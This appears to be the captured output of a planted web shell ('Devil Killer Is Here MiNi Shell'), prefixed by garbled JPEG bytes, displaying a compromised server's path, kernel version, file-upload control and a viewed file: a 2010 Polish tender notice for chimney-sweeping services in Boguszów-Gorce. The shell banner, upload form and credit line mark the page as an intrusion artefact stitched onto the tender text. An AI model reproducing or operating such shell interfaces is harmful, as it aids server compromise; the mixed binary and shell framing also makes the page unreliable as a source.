JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100211/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100211/38994-N-2010.html

<p class="kh_header"><b>Boguszów-Gorce: Świadczenie usług kominiarskich w budynkach  gminnych i wspólnot mieszkaniowych na terenie miasta Boguszowa-Gorc będących w zarządzie ZGM Sp. z o.o w Boguszowie-Gorcach</b><br>
<b>Numer ogłoszenia: 38994 - 2010; data zamieszczenia: 11.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej Sp. z o. o. , ul. Świerczewskiego 46, 58-370 Boguszów-Gorce, woj. dolnośląskie, tel. 074 8449411 w. 33, faks 074 8449469.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług kominiarskich w budynkach  gminnych i wspólnot mieszkaniowych na terenie miasta Boguszowa-Gorc będących w zarządzie ZGM Sp. z o.o w Boguszowie-Gorcach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1 Czyszczenie przewodów kominowych należy wykonać z następującą częstotliwością:
Czyszczenie i udrożnienie kanałów wentylacyjnych wraz z przykanalikami   - 1 raz w roku 
Czyszczenie i udrożnienie kanałów spalinowych wraz z przykanalikami        - 2 razy w roku
Czyszczenie i udrożnienie kanałów dymowych wraz z przykanalikami          - 4 razy w roku 
        1. W trakcie czyszczenia przewodów kominowych należy :
a) oczyścić prawidłowo przewód kominowy na całej długości użytkowej łącznie z nasadami ,  
    kanałami i kanałami przełazowymi
b) wybrać sadze z przewodów kominowych  z usunięciem  sadzy poza teren obiektu
c) sprawdzić stan zagrożenia pożarowego od przewodów kominowych , połączeń paleniskowych ,     
    kanałów.
      2. Na dwa dni przed rozpoczęciem usług czyszczenia przewodów kominowych, wykonawca      
           powiadomi  mieszkańców budynku w którym wykonywane będą usługi.
SPRAWDZ
1.2.Sprawdzenie stanu technicznego sprawności przewodów kominowych(dymowych ,spalinowych  i     
       wentylacyjnych)

  Zakres prac , który Zamawiający będzie wymagał przy sprawdzeniu stanu technicznego  sprawności:
  a. Sprawdzenie stanu technicznego i prawidłowości podłączenia przewodu odprowadzającego spaliny z   
      gazowego przepływowego podgrzewacza wody, kotła dwufunkcyjnego w przypadku ogrzewania  
      etażowego oraz piecy opalanych paliwem stałym, do kanału spalinowego lub dymowego -1 raz w roku
  b .Sprawdzenie prawidłowości umiejscowienia, drożności i zastosowania prawidłowego przekroju  
      kratek wentylacyjnych w pomieszczeniach w których eksploatowane są kotły gazowe, piece oraz  
      kuchenki gazowe - 1 raz w roku 
  c.  Sprawdzenie siły ciągu kominowego (ciśnienia)
  d. Sprawdzenie czy nie występują uszkodzenia przewodów kominowych na całej długości, kanałów 
      czopuchów, rur, łączników
  e. Sprawdzenie stanu włazów, drabin, drzwiczek kominowych, ław kominiarskich, nasad kominowych,
  f.  Wykonanie przeglądu stanu technicznego kanałów wentylacyjnych, spalinowych i dymowych wraz z  
      wydaniem opinii kominiarskiej, w postaci (Protokołu z okresowej kontroli kanałów kominowych  
      (wentylacyjnych, spalinowych, dymowych). Wzór protokołu stanowi załącznik nr 3  i 4 do umowy -
      1 raz w roku 
  g. Wydanie zaleceń dot. usunięcia nieprawidłowości, wyeliminowania zagrożenia zdrowia i życia 
      zamieszkujących w kontrolowanych nieruchomościach ( bezwzględnie na piśmie)
  h. Sporządzenie, w przypadku stwierdzenia usterek, protokołu określającego zakres usterek,  
      zalecenia oraz wyznaczenie terminu na ich usunięcie.
  I.  Sprawdzenie prawidłowości usunięcia usterek i ponowne wydanie opinii dopuszczające kanały 
      kominowe (wentylacyjne, spalinowe, dymowe) do eksploatacji w postaci protokołu jak w punkcie f.

1.3. Zamówienie podzielone jest na 6 odrębnych zadań obejmujących zasób ZGM w 6-ciu Rejonach
    - zadanie nr 1          ( REJON I     - ilość przewodów : wentylacyjne  - 291 ; spalinowe - 194;  dymowe - 643)
    - zadanie nr 2           (REJON II    - ilość przewodów : wentylacyjne  -  68  ; spalinowe  -  16;  dymowe - 484)
    - zadanie nr 3           (REJON III   - ilość przewodów : wentylacyjne  - 263 ; spalinowe - 127;  dymowe - 556)
    - zadanie nr 4           (REJON IV   - ilość przewodów : wentylacyjne  - 729 ; spalinowe - 345;  dymowe - 550)
    - zadanie nr 5           (REJON V    - ilość przewodów : wentylacyjne  - 308 ; spalinowe -   79;  dymowe - 528)
    - zadanie nr 6           (REJON VI   - ilość przewodów : wentylacyjne  - 170 ; spalinowe -   48;   dymowe - 772).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.50.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy:
a)posiadają uprawnienia do wykonywania czynności w zakresie określonym w pkt. 1 SIWZ, zgodnie z wymaganiami ustawowymi,
b)dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia  osób zdolnych do wykonywania  zamówienia;
c) zatrudniają bądź zatrudnią  co najmniej jedną osobę odpowiedzialną za realizację zamówienia,  która posiada następujące kwalifikacje,
 -  staż pracy przy wykonywaniu takich prac jak przedmiot zamówienia co najmniej 5 lat,
 -  uprawnienia określone w art. 62 ust. 6 ustawy Prawo budowlane;
d) zatrudniają bądź zatrudnią co najmniej 2 osoby do wykonywania 1/2 czynności będących przedmiotem zamówienia ( tzn. do co najmniej 3 zadań);
Ocena spepełnienia warunków udziału w postępowaniu dokonywana będzie  w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia , niespełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. posiadają niezbędną wiedzę i doświadczenie
2. przedstawią wykaz wykonywanych w ciągu ostatnich 3 lat zamówień wraz z   potwierdzeniem należytegowykonania zamówienia - załącznik nr 3 do siwz.Ocena spepełnienia warunków udziału w postępowaniu dokonywana będzie  w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia , niespełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Dysponują  niezbędnymi do wykonania narzędziami  i urządzeniami  - załącznik nr 5 do siwz
Ocena spepełnienia warunków udziału w postępowaniu dokonywana będzie  w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia , niespełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Wykaz personelu mającego wymagane kwalifikacje do wykonania zamówienia (min. 2 pracowników). Do oferty należy załączyć kopię dokumentu potwierdzającego posiadanie tytułu       mistrza w rzemiośle kominiarskim - wg załącznik nr 4 do siwz
Ocena spepełnienia warunków udziału w postępowaniu dokonywana będzie  w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia , niespełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - załącznik nr 1
2.  Stawka za usługi czyszczenia i przegląd budynków  sporządzona ściśle wg wzoru druku załączonego przez zamawiającego- załącznik Nr 2 do siwz  (oraz zał.  1.1-1.6 do umowy ) 
3. Oryginał pełnomocnictw jeśli oferta będzie podpisana przez pełnomocnika.
4. Oświadczenie o akceptacji warunków umowy (zał. Nr 7)  -załącznik nr 6 do siwz
5.  Projekt umowy - załącznik    nr 7 do siwz.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.boguszow-gorce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Świerczewskiego 46,Boguszów-Gorce pok. nr 7 (Dział Techniczny).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2010 godzina 11:00, miejsce: Zakład Gospodarki Mieszkaniowej Spółka z o.o.
ul. Świerczewskiego 46,Boguszów-Gorce pok. nr 8 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com